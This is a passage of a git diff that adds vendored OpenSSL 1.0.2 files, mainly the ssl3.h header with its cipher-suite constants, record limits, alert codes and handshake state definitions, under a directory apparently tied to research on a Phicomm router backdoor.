+# define SSL3_CK_KRB5_RC4_128_MD5                0x03000024
+# define SSL3_CK_KRB5_IDEA_128_CBC_MD5           0x03000025
+
+# define SSL3_CK_KRB5_DES_40_CBC_SHA             0x03000026
+# define SSL3_CK_KRB5_RC2_40_CBC_SHA             0x03000027
+# define SSL3_CK_KRB5_RC4_40_SHA                 0x03000028
+# define SSL3_CK_KRB5_DES_40_CBC_MD5             0x03000029
+# define SSL3_CK_KRB5_RC2_40_CBC_MD5             0x0300002A
+# define SSL3_CK_KRB5_RC4_40_MD5                 0x0300002B
+
+# define SSL3_TXT_RSA_NULL_MD5                   "NULL-MD5"
+# define SSL3_TXT_RSA_NULL_SHA                   "NULL-SHA"
+# define SSL3_TXT_RSA_RC4_40_MD5                 "EXP-RC4-MD5"
+# define SSL3_TXT_RSA_RC4_128_MD5                "RC4-MD5"
+# define SSL3_TXT_RSA_RC4_128_SHA                "RC4-SHA"
+# define SSL3_TXT_RSA_RC2_40_MD5                 "EXP-RC2-CBC-MD5"
+# define SSL3_TXT_RSA_IDEA_128_SHA               "IDEA-CBC-SHA"
+# define SSL3_TXT_RSA_DES_40_CBC_SHA             "EXP-DES-CBC-SHA"
+# define SSL3_TXT_RSA_DES_64_CBC_SHA             "DES-CBC-SHA"
+# define SSL3_TXT_RSA_DES_192_CBC3_SHA           "DES-CBC3-SHA"
+
+# define SSL3_TXT_DH_DSS_DES_40_CBC_SHA          "EXP-DH-DSS-DES-CBC-SHA"
+# define SSL3_TXT_DH_DSS_DES_64_CBC_SHA          "DH-DSS-DES-CBC-SHA"
+# define SSL3_TXT_DH_DSS_DES_192_CBC3_SHA        "DH-DSS-DES-CBC3-SHA"
+# define SSL3_TXT_DH_RSA_DES_40_CBC_SHA          "EXP-DH-RSA-DES-CBC-SHA"
+# define SSL3_TXT_DH_RSA_DES_64_CBC_SHA          "DH-RSA-DES-CBC-SHA"
+# define SSL3_TXT_DH_RSA_DES_192_CBC3_SHA        "DH-RSA-DES-CBC3-SHA"
+
+# define SSL3_TXT_DHE_DSS_DES_40_CBC_SHA         "EXP-DHE-DSS-DES-CBC-SHA"
+# define SSL3_TXT_DHE_DSS_DES_64_CBC_SHA         "DHE-DSS-DES-CBC-SHA"
+# define SSL3_TXT_DHE_DSS_DES_192_CBC3_SHA       "DHE-DSS-DES-CBC3-SHA"
+# define SSL3_TXT_DHE_RSA_DES_40_CBC_SHA         "EXP-DHE-RSA-DES-CBC-SHA"
+# define SSL3_TXT_DHE_RSA_DES_64_CBC_SHA         "DHE-RSA-DES-CBC-SHA"
+# define SSL3_TXT_DHE_RSA_DES_192_CBC3_SHA       "DHE-RSA-DES-CBC3-SHA"
+
+/*
+ * This next block of six "EDH" labels is for backward compatibility with
+ * older versions of OpenSSL.  New code should use the six "DHE" labels above
+ * instead:
+ */
+# define SSL3_TXT_EDH_DSS_DES_40_CBC_SHA         "EXP-EDH-DSS-DES-CBC-SHA"
+# define SSL3_TXT_EDH_DSS_DES_64_CBC_SHA         "EDH-DSS-DES-CBC-SHA"
+# define SSL3_TXT_EDH_DSS_DES_192_CBC3_SHA       "EDH-DSS-DES-CBC3-SHA"
+# define SSL3_TXT_EDH_RSA_DES_40_CBC_SHA         "EXP-EDH-RSA-DES-CBC-SHA"
+# define SSL3_TXT_EDH_RSA_DES_64_CBC_SHA         "EDH-RSA-DES-CBC-SHA"
+# define SSL3_TXT_EDH_RSA_DES_192_CBC3_SHA       "EDH-RSA-DES-CBC3-SHA"
+
+# define SSL3_TXT_ADH_RC4_40_MD5                 "EXP-ADH-RC4-MD5"
+# define SSL3_TXT_ADH_RC4_128_MD5                "ADH-RC4-MD5"
+# define SSL3_TXT_ADH_DES_40_CBC_SHA             "EXP-ADH-DES-CBC-SHA"
+# define SSL3_TXT_ADH_DES_64_CBC_SHA             "ADH-DES-CBC-SHA"
+# define SSL3_TXT_ADH_DES_192_CBC_SHA            "ADH-DES-CBC3-SHA"
+
+# if 0
+#  define SSL3_TXT_FZA_DMS_NULL_SHA               "FZA-NULL-SHA"
+#  define SSL3_TXT_FZA_DMS_FZA_SHA                "FZA-FZA-CBC-SHA"
+#  define SSL3_TXT_FZA_DMS_RC4_SHA                "FZA-RC4-SHA"
+# endif
+
+# define SSL3_TXT_KRB5_DES_64_CBC_SHA            "KRB5-DES-CBC-SHA"
+# define SSL3_TXT_KRB5_DES_192_CBC3_SHA          "KRB5-DES-CBC3-SHA"
+# define SSL3_TXT_KRB5_RC4_128_SHA               "KRB5-RC4-SHA"
+# define SSL3_TXT_KRB5_IDEA_128_CBC_SHA          "KRB5-IDEA-CBC-SHA"
+# define SSL3_TXT_KRB5_DES_64_CBC_MD5            "KRB5-DES-CBC-MD5"
+# define SSL3_TXT_KRB5_DES_192_CBC3_MD5          "KRB5-DES-CBC3-MD5"
+# define SSL3_TXT_KRB5_RC4_128_MD5               "KRB5-RC4-MD5"
+# define SSL3_TXT_KRB5_IDEA_128_CBC_MD5          "KRB5-IDEA-CBC-MD5"
+
+# define SSL3_TXT_KRB5_DES_40_CBC_SHA            "EXP-KRB5-DES-CBC-SHA"
+# define SSL3_TXT_KRB5_RC2_40_CBC_SHA            "EXP-KRB5-RC2-CBC-SHA"
+# define SSL3_TXT_KRB5_RC4_40_SHA                "EXP-KRB5-RC4-SHA"
+# define SSL3_TXT_KRB5_DES_40_CBC_MD5            "EXP-KRB5-DES-CBC-MD5"
+# define SSL3_TXT_KRB5_RC2_40_CBC_MD5            "EXP-KRB5-RC2-CBC-MD5"
+# define SSL3_TXT_KRB5_RC4_40_MD5                "EXP-KRB5-RC4-MD5"
+
+# define SSL3_SSL_SESSION_ID_LENGTH              32
+# define SSL3_MAX_SSL_SESSION_ID_LENGTH          32
+
+# define SSL3_MASTER_SECRET_SIZE                 48
+# define SSL3_RANDOM_SIZE                        32
+# define SSL3_SESSION_ID_SIZE                    32
+# define SSL3_RT_HEADER_LENGTH                   5
+
+# define SSL3_HM_HEADER_LENGTH                  4
+
+# ifndef SSL3_ALIGN_PAYLOAD
+ /*
+  * Some will argue that this increases memory footprint, but it's not
+  * actually true. Point is that malloc has to return at least 64-bit aligned
+  * pointers, meaning that allocating 5 bytes wastes 3 bytes in either case.
+  * Suggested pre-gaping simply moves these wasted bytes from the end of
+  * allocated region to its front, but makes data payload aligned, which
+  * improves performance:-)
+  */
+#  define SSL3_ALIGN_PAYLOAD                     8
+# else
+#  if (SSL3_ALIGN_PAYLOAD&(SSL3_ALIGN_PAYLOAD-1))!=0
+#   error "insane SSL3_ALIGN_PAYLOAD"
+#   undef SSL3_ALIGN_PAYLOAD
+#  endif
+# endif
+
+/*
+ * This is the maximum MAC (digest) size used by the SSL library. Currently
+ * maximum of 20 is used by SHA1, but we reserve for future extension for
+ * 512-bit hashes.
+ */
+
+# define SSL3_RT_MAX_MD_SIZE                     64
+
+/*
+ * Maximum block size used in all ciphersuites. Currently 16 for AES.
+ */
+
+# define SSL_RT_MAX_CIPHER_BLOCK_SIZE            16
+
+# define SSL3_RT_MAX_EXTRA                       (16384)
+
+/* Maximum plaintext length: defined by SSL/TLS standards */
+# define SSL3_RT_MAX_PLAIN_LENGTH                16384
+/* Maximum compression overhead: defined by SSL/TLS standards */
+# define SSL3_RT_MAX_COMPRESSED_OVERHEAD         1024
+
+/*
+ * The standards give a maximum encryption overhead of 1024 bytes. In
+ * practice the value is lower than this. The overhead is the maximum number
+ * of padding bytes (256) plus the mac size.
+ */
+# define SSL3_RT_MAX_ENCRYPTED_OVERHEAD  (256 + SSL3_RT_MAX_MD_SIZE)
+
+/*
+ * OpenSSL currently only uses a padding length of at most one block so the
+ * send overhead is smaller.
+ */
+
+# define SSL3_RT_SEND_MAX_ENCRYPTED_OVERHEAD \
+                        (SSL_RT_MAX_CIPHER_BLOCK_SIZE + SSL3_RT_MAX_MD_SIZE)
+
+/* If compression isn't used don't include the compression overhead */
+
+# ifdef OPENSSL_NO_COMP
+#  define SSL3_RT_MAX_COMPRESSED_LENGTH           SSL3_RT_MAX_PLAIN_LENGTH
+# else
+#  define SSL3_RT_MAX_COMPRESSED_LENGTH   \
+                (SSL3_RT_MAX_PLAIN_LENGTH+SSL3_RT_MAX_COMPRESSED_OVERHEAD)
+# endif
+# define SSL3_RT_MAX_ENCRYPTED_LENGTH    \
+                (SSL3_RT_MAX_ENCRYPTED_OVERHEAD+SSL3_RT_MAX_COMPRESSED_LENGTH)
+# define SSL3_RT_MAX_PACKET_SIZE         \
+                (SSL3_RT_MAX_ENCRYPTED_LENGTH+SSL3_RT_HEADER_LENGTH)
+
+# define SSL3_MD_CLIENT_FINISHED_CONST   "\x43\x4C\x4E\x54"
+# define SSL3_MD_SERVER_FINISHED_CONST   "\x53\x52\x56\x52"
+
+# define SSL3_VERSION                    0x0300
+# define SSL3_VERSION_MAJOR              0x03
+# define SSL3_VERSION_MINOR              0x00
+
+# define SSL3_RT_CHANGE_CIPHER_SPEC      20
+# define SSL3_RT_ALERT                   21
+# define SSL3_RT_HANDSHAKE               22
+# define SSL3_RT_APPLICATION_DATA        23
+# define TLS1_RT_HEARTBEAT               24
+
+/* Pseudo content types to indicate additional parameters */
+# define TLS1_RT_CRYPTO                  0x1000
+# define TLS1_RT_CRYPTO_PREMASTER        (TLS1_RT_CRYPTO | 0x1)
+# define TLS1_RT_CRYPTO_CLIENT_RANDOM    (TLS1_RT_CRYPTO | 0x2)
+# define TLS1_RT_CRYPTO_SERVER_RANDOM    (TLS1_RT_CRYPTO | 0x3)
+# define TLS1_RT_CRYPTO_MASTER           (TLS1_RT_CRYPTO | 0x4)
+
+# define TLS1_RT_CRYPTO_READ             0x0000
+# define TLS1_RT_CRYPTO_WRITE            0x0100
+# define TLS1_RT_CRYPTO_MAC              (TLS1_RT_CRYPTO | 0x5)
+# define TLS1_RT_CRYPTO_KEY              (TLS1_RT_CRYPTO | 0x6)
+# define TLS1_RT_CRYPTO_IV               (TLS1_RT_CRYPTO | 0x7)
+# define TLS1_RT_CRYPTO_FIXED_IV         (TLS1_RT_CRYPTO | 0x8)
+
+/* Pseudo content type for SSL/TLS header info */
+# define SSL3_RT_HEADER                  0x100
+
+# define SSL3_AL_WARNING                 1
+# define SSL3_AL_FATAL                   2
+
+# define SSL3_AD_CLOSE_NOTIFY             0
+# define SSL3_AD_UNEXPECTED_MESSAGE      10/* fatal */
+# define SSL3_AD_BAD_RECORD_MAC          20/* fatal */
+# define SSL3_AD_DECOMPRESSION_FAILURE   30/* fatal */
+# define SSL3_AD_HANDSHAKE_FAILURE       40/* fatal */
+# define SSL3_AD_NO_CERTIFICATE          41
+# define SSL3_AD_BAD_CERTIFICATE         42
+# define SSL3_AD_UNSUPPORTED_CERTIFICATE 43
+# define SSL3_AD_CERTIFICATE_REVOKED     44
+# define SSL3_AD_CERTIFICATE_EXPIRED     45
+# define SSL3_AD_CERTIFICATE_UNKNOWN     46
+# define SSL3_AD_ILLEGAL_PARAMETER       47/* fatal */
+
+# define TLS1_HB_REQUEST         1
+# define TLS1_HB_RESPONSE        2
+
+# ifndef OPENSSL_NO_SSL_INTERN
+
+typedef struct ssl3_record_st {
+    /* type of record */
+    /*
+     * r
+     */ int type;
+    /* How many bytes available */
+    /*
+     * rw
+     */ unsigned int length;
+    /* read/write offset into 'buf' */
+    /*
+     * r
+     */ unsigned int off;
+    /* pointer to the record data */
+    /*
+     * rw
+     */ unsigned char *data;
+    /* where the decode bytes are */
+    /*
+     * rw
+     */ unsigned char *input;
+    /* only used with decompression - malloc()ed */
+    /*
+     * r
+     */ unsigned char *comp;
+    /* epoch number, needed by DTLS1 */
+    /*
+     * r
+     */ unsigned long epoch;
+    /* sequence number, needed by DTLS1 */
+    /*
+     * r
+     */ unsigned char seq_num[8];
+} SSL3_RECORD;
+
+typedef struct ssl3_buffer_st {
+    /* at least SSL3_RT_MAX_PACKET_SIZE bytes, see ssl3_setup_buffers() */
+    unsigned char *buf;
+    /* buffer size */
+    size_t len;
+    /* where to 'copy from' */
+    int offset;
+    /* how many bytes left */
+    int left;
+} SSL3_BUFFER;
+
+# endif
+
+# define SSL3_CT_RSA_SIGN                        1
+# define SSL3_CT_DSS_SIGN                        2
+# define SSL3_CT_RSA_FIXED_DH                    3
+# define SSL3_CT_DSS_FIXED_DH                    4
+# define SSL3_CT_RSA_EPHEMERAL_DH                5
+# define SSL3_CT_DSS_EPHEMERAL_DH                6
+# define SSL3_CT_FORTEZZA_DMS                    20
+/*
+ * SSL3_CT_NUMBER is used to size arrays and it must be large enough to
+ * contain all of the cert types defined either for SSLv3 and TLSv1.
+ */
+# define SSL3_CT_NUMBER                  9
+
+# define SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS       0x0001
+# define SSL3_FLAGS_DELAY_CLIENT_FINISHED        0x0002
+# define SSL3_FLAGS_POP_BUFFER                   0x0004
+# define TLS1_FLAGS_TLS_PADDING_BUG              0x0008
+# define TLS1_FLAGS_SKIP_CERT_VERIFY             0x0010
+# define TLS1_FLAGS_KEEP_HANDSHAKE               0x0020
+/*
+ * Set when the handshake is ready to process peer's ChangeCipherSpec message.
+ * Cleared after the message has been processed.
+ */
+# define SSL3_FLAGS_CCS_OK                       0x0080
+
+/* SSL3_FLAGS_SGC_RESTART_DONE is no longer used */
+# define SSL3_FLAGS_SGC_RESTART_DONE             0x0040
+
+# ifndef OPENSSL_NO_SSL_INTERN
+
+typedef struct ssl3_state_st {
+    long flags;
+    int delay_buf_pop_ret;
+    unsigned char read_sequence[8];
+    int read_mac_secret_size;
+    unsigned char read_mac_secret[EVP_MAX_MD_SIZE];
+    unsigned char write_sequence[8];
+    int write_mac_secret_size;
+    unsigned char write_mac_secret[EVP_MAX_MD_SIZE];
+    unsigned char server_random[SSL3_RANDOM_SIZE];
+    unsigned char client_random[SSL3_RANDOM_SIZE];
+    /* flags for countermeasure against known-IV weakness */
+    int need_empty_fragments;
+    int empty_fragment_done;
+    /* The value of 'extra' when the buffers were initialized */
+    int init_extra;
+    SSL3_BUFFER rbuf;           /* read IO goes into here */
+    SSL3_BUFFER wbuf;           /* write IO goes into here */
+    SSL3_RECORD rrec;           /* each decoded record goes in here */
+    SSL3_RECORD wrec;           /* goes out from here */
+    /*
+     * storage for Alert/Handshake protocol data received but not yet
+     * processed by ssl3_read_bytes:
+     */
+    unsigned char alert_fragment[2];
+    unsigned int alert_fragment_len;
+    unsigned char handshake_fragment[4];
+    unsigned int handshake_fragment_len;
+    /* partial write - check the numbers match */
+    unsigned int wnum;          /* number of bytes sent so far */
+    int wpend_tot;              /* number bytes written */
+    int wpend_type;
+    int wpend_ret;              /* number of bytes submitted */
+    const unsigned char *wpend_buf;
+    /* used during startup, digest all incoming/outgoing packets */
+    BIO *handshake_buffer;
+    /*
+     * When set of handshake digests is determined, buffer is hashed and
+     * freed and MD_CTX-es for all required digests are stored in this array
+     */
+    EVP_MD_CTX **handshake_dgst;
+    /*
+     * Set whenever an expected ChangeCipherSpec message is processed.
+     * Unset when the peer's Finished message is received.
+     * Unexpected ChangeCipherSpec messages trigger a fatal alert.
+     */
+    int change_cipher_spec;
+    int warn_alert;
+    int fatal_alert;
+    /*
+     * we allow one fatal and one warning alert to be outstanding, send close
+     * alert via the warning alert
+     */
+    int alert_dispatch;
+    unsigned char send_alert[2];
+    /*
+     * This flag is set when we should renegotiate ASAP, basically when there
+     * is no more data in the read or write buffers
+     */
+    int renegotiate;
+    int total_renegotiations;
+    int num_renegotiations;
+    int in_read_app_data;
+    /*
+     * Opaque PRF input as used for the current handshake. These fields are
+     * used only if TLSEXT_TYPE_opaque_prf_input is defined (otherwise, they
+     * are merely present to improve binary compatibility)
+     */
+    void *client_opaque_prf_input;
+    size_t client_opaque_prf_input_len;
+    void *server_opaque_prf_input;
+    size_t server_opaque_prf_input_len;
+    struct {
+        /* actually only needs to be 16+20 */
+        unsigned char cert_verify_md[EVP_MAX_MD_SIZE * 2];
+        /* actually only need to be 16+20 for SSLv3 and 12 for TLS */
+        unsigned char finish_md[EVP_MAX_MD_SIZE * 2];
+        int finish_md_len;
+        unsigned char peer_finish_md[EVP_MAX_MD_SIZE * 2];
+        int peer_finish_md_len;
+        unsigned long message_size;
+        int message_type;
+        /* used to hold the new cipher we are going to use */
+        const SSL_CIPHER *new_cipher;
+#  ifndef OPENSSL_NO_DH
+        DH *dh;
+#  endif
+#  ifndef OPENSSL_NO_ECDH
+        EC_KEY *ecdh;           /* holds short lived ECDH key */
+#  endif
+        /* used when SSL_ST_FLUSH_DATA is entered */
+        int next_state;
+        int reuse_message;
+        /* used for certificate requests */
+        int cert_req;
+        int ctype_num;
+        char ctype[SSL3_CT_NUMBER];
+        STACK_OF(X509_NAME) *ca_names;
+        int use_rsa_tmp;
+        int key_block_length;
+        unsigned char *key_block;
+        const EVP_CIPHER *new_sym_enc;
+        const EVP_MD *new_hash;
+        int new_mac_pkey_type;
+        int new_mac_secret_size;
+#  ifndef OPENSSL_NO_COMP
+        const SSL_COMP *new_compression;
+#  else
+        char *new_compression;
+#  endif
+        int cert_request;
+    } tmp;
+
+    /* Connection binding to prevent renegotiation attacks */
+    unsigned char previous_client_finished[EVP_MAX_MD_SIZE];
+    unsigned char previous_client_finished_len;
+    unsigned char previous_server_finished[EVP_MAX_MD_SIZE];
+    unsigned char previous_server_finished_len;
+    int send_connection_binding; /* TODOEKR */
+
+#  ifndef OPENSSL_NO_NEXTPROTONEG
+    /*
+     * Set if we saw the Next Protocol Negotiation extension from our peer.
+     */
+    int next_proto_neg_seen;
+#  endif
+
+#  ifndef OPENSSL_NO_TLSEXT
+#   ifndef OPENSSL_NO_EC
+    /*
+     * This is set to true if we believe that this is a version of Safari
+     * running on OS X 10.6 or newer. We wish to know this because Safari on
+     * 10.8 .. 10.8.3 has broken ECDHE-ECDSA support.
+     */
+    char is_probably_safari;
+#   endif                       /* !OPENSSL_NO_EC */
+
+    /*
+     * ALPN information (we are in the process of transitioning from NPN to
+     * ALPN.)
+     */
+
+    /*
+     * In a server these point to the selected ALPN protocol after the
+     * ClientHello has been processed. In a client these contain the protocol
+     * that the server selected once the ServerHello has been processed.
+     */
+    unsigned char *alpn_selected;
+    unsigned alpn_selected_len;
+#  endif                        /* OPENSSL_NO_TLSEXT */
+} SSL3_STATE;
+
+# endif
+
+/* SSLv3 */
+/*
+ * client
+ */
+/* extra state */
+# define SSL3_ST_CW_FLUSH                (0x100|SSL_ST_CONNECT)
+# ifndef OPENSSL_NO_SCTP
+#  define DTLS1_SCTP_ST_CW_WRITE_SOCK                     (0x310|SSL_ST_CONNECT)
+#  define DTLS1_SCTP_ST_CR_READ_SOCK                      (0x320|SSL_ST_CONNECT)
+# endif
+/* write to server */
+# define SSL3_ST_CW_CLNT_HELLO_A         (0x110|SSL_ST_CONNECT)
+# define SSL3_ST_CW_CLNT_HELLO_B         (0x111|SSL_ST_CONNECT)
+/* read from server */
+# define SSL3_ST_CR_SRVR_HELLO_A         (0x120|SSL_ST_CONNECT)
+# define SSL3_ST_CR_SRVR_HELLO_B         (0x121|SSL_ST_CONNECT)
+# define DTLS1_ST_CR_HELLO_VERIFY_REQUEST_A (0x126|SSL_ST_CONNECT)
+# define DTLS1_ST_CR_HELLO_VERIFY_REQUEST_B (0x127|SSL_ST_CONNECT)
+# define SSL3_ST_CR_CERT_A               (0x130|SSL_ST_CONNECT)
+# define SSL3_ST_CR_CERT_B               (0x131|SSL_ST_CONNECT)
+# define SSL3_ST_CR_KEY_EXCH_A           (0x140|SSL_ST_CONNECT)
+# define SSL3_ST_CR_KEY_EXCH_B           (0x141|SSL_ST_CONNECT)
+# define SSL3_ST_CR_CERT_REQ_A           (0x150|SSL_ST_CONNECT)
+# define SSL3_ST_CR_CERT_REQ_B           (0x151|SSL_ST_CONNECT)
+# define SSL3_ST_CR_SRVR_DONE_A          (0x160|SSL_ST_CONNECT)
+# define SSL3_ST_CR_SRVR_DONE_B          (0x161|SSL_ST_CONNECT)
+/* write to server */
+# define SSL3_ST_CW_CERT_A               (0x170|SSL_ST_CONNECT)
+# define SSL3_ST_CW_CERT_B               (0x171|SSL_ST_CONNECT)
+# define SSL3_ST_CW_CERT_C               (0x172|SSL_ST_CONNECT)
+# define SSL3_ST_CW_CERT_D               (0x173|SSL_ST_CONNECT)
+# define SSL3_ST_CW_KEY_EXCH_A           (0x180|SSL_ST_CONNECT)
+# define SSL3_ST_CW_KEY_EXCH_B           (0x181|SSL_ST_CONNECT)
+# define SSL3_ST_CW_CERT_VRFY_A          (0x190|SSL_ST_CONNECT)
+# define SSL3_ST_CW_CERT_VRFY_B          (0x191|SSL_ST_CONNECT)
+# define SSL3_ST_CW_CHANGE_A             (0x1A0|SSL_ST_CONNECT)
+# define SSL3_ST_CW_CHANGE_B             (0x1A1|SSL_ST_CONNECT)
+# ifndef OPENSSL_NO_NEXTPROTONEG
+#  define SSL3_ST_CW_NEXT_PROTO_A         (0x200|SSL_ST_CONNECT)
+#  define SSL3_ST_CW_NEXT_PROTO_B         (0x201|SSL_ST_CONNECT)
+# endif
+# define SSL3_ST_CW_FINISHED_A           (0x1B0|SSL_ST_CONNECT)
+# define SSL3_ST_CW_FINISHED_B           (0x1B1|SSL_ST_CONNECT)
+/* read from server */
+# define SSL3_ST_CR_CHANGE_A             (0x1C0|SSL_ST_CONNECT)
+# define SSL3_ST_CR_CHANGE_B             (0x1C1|SSL_ST_CONNECT)
+# define SSL3_ST_CR_FINISHED_A           (0x1D0|SSL_ST_CONNECT)
+# define SSL3_ST_CR_FINISHED_B           (0x1D1|SSL_ST_CONNECT)
+# define SSL3_ST_CR_SESSION_TICKET_A     (0x1E0|SSL_ST_CONNECT)
+# define SSL3_ST_CR_SESSION_TICKET_B     (0x1E1|SSL_ST_CONNECT)
+# define SSL3_ST_CR_CERT_STATUS_A        (0x1F0|SSL_ST_CONNECT)
+# define SSL3_ST_CR_CERT_STATUS_B        (0x1F1|SSL_ST_CONNECT)
+
+/* server */
+/* extra state */
+# define SSL3_ST_SW_FLUSH                (0x100|SSL_ST_ACCEPT)
+# ifndef OPENSSL_NO_SCTP
+#  define DTLS1_SCTP_ST_SW_WRITE_SOCK                     (0x310|SSL_ST_ACCEPT)
+#  define DTLS1_SCTP_ST_SR_READ_SOCK                      (0x320|SSL_ST_ACCEPT)
+# endif
+/* read from client */
+/* Do not change the number values, they do matter */
+# define SSL3_ST_SR_CLNT_HELLO_A         (0x110|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_CLNT_HELLO_B         (0x111|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_CLNT_HELLO_C         (0x112|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_CLNT_HELLO_D         (0x115|SSL_ST_ACCEPT)
+/* write to client */
+# define DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A (0x113|SSL_ST_ACCEPT)
+# define DTLS1_ST_SW_HELLO_VERIFY_REQUEST_B (0x114|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_HELLO_REQ_A          (0x120|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_HELLO_REQ_B          (0x121|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_HELLO_REQ_C          (0x122|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_SRVR_HELLO_A         (0x130|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_SRVR_HELLO_B         (0x131|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_CERT_A               (0x140|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_CERT_B               (0x141|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_KEY_EXCH_A           (0x150|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_KEY_EXCH_B           (0x151|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_CERT_REQ_A           (0x160|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_CERT_REQ_B           (0x161|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_SRVR_DONE_A          (0x170|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_SRVR_DONE_B          (0x171|SSL_ST_ACCEPT)
+/* read from client */
+# define SSL3_ST_SR_CERT_A               (0x180|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_CERT_B               (0x181|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_KEY_EXCH_A           (0x190|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_KEY_EXCH_B           (0x191|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_CERT_VRFY_A          (0x1A0|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_CERT_VRFY_B          (0x1A1|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_CHANGE_A             (0x1B0|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_CHANGE_B             (0x1B1|SSL_ST_ACCEPT)
+# ifndef OPENSSL_NO_NEXTPROTONEG
+#  define SSL3_ST_SR_NEXT_PROTO_A         (0x210|SSL_ST_ACCEPT)
+#  define SSL3_ST_SR_NEXT_PROTO_B         (0x211|SSL_ST_ACCEPT)
+# endif
+# define SSL3_ST_SR_FINISHED_A           (0x1C0|SSL_ST_ACCEPT)
+# define SSL3_ST_SR_FINISHED_B           (0x1C1|SSL_ST_ACCEPT)
+/* write to client */
+# define SSL3_ST_SW_CHANGE_A             (0x1D0|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_CHANGE_B             (0x1D1|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_FINISHED_A           (0x1E0|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_FINISHED_B           (0x1E1|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_SESSION_TICKET_A     (0x1F0|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_SESSION_TICKET_B     (0x1F1|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_CERT_STATUS_A        (0x200|SSL_ST_ACCEPT)
+# define SSL3_ST_SW_CERT_STATUS_B        (0x201|SSL_ST_ACCEPT)
+
+# define SSL3_MT_HELLO_REQUEST                   0
+# define SSL3_MT_CLIENT_HELLO                    1
+# define SSL3_MT_SERVER_HELLO                    2
+# define SSL3_MT_NEWSESSION_TICKET               4
+# define SSL3_MT_CERTIFICATE                     11
+# define SSL3_MT_SERVER_KEY_EXCHANGE             12
+# define SSL3_MT_CERTIFICATE_REQUEST             13
+# define SSL3_MT_SERVER_DONE                     14
+# define SSL3_MT_CERTIFICATE_VERIFY              15
+# define SSL3_MT_CLIENT_KEY_EXCHANGE             16
+# define SSL3_MT_FINISHED                        20
+# define SSL3_MT_CERTIFICATE_STATUS              22
+# ifndef OPENSSL_NO_NEXTPROTONEG
+#  define SSL3_MT_NEXT_PROTO                      67
+# endif
+# define DTLS1_MT_HELLO_VERIFY_REQUEST    3
+
+# define SSL3_MT_CCS                             1
+
+/* These are used when changing over to a new cipher */
+# define SSL3_CC_READ            0x01
+# define SSL3_CC_WRITE           0x02
+# define SSL3_CC_CLIENT          0x10
+# define SSL3_CC_SERVER          0x20
+# define SSL3_CHANGE_CIPHER_CLIENT_WRITE (SSL3_CC_CLIENT|SSL3_CC_WRITE)
+# define SSL3_CHANGE_CIPHER_SERVER_READ  (SSL3_CC_SERVER|SSL3_CC_READ)
+# define SSL3_CHANGE_CIPHER_CLIENT_READ  (SSL3_CC_CLIENT|SSL3_CC_READ)
+# define SSL3_CHANGE_CIPHER_SERVER_WRITE (SSL3_CC_SERVER|SSL3_CC_WRITE)
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_algs.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_algs.c
new file mode 100644
index 0000000..e6f515f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_algs.c
@@ -0,0 +1,155 @@
+/* ssl/ssl_algs.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
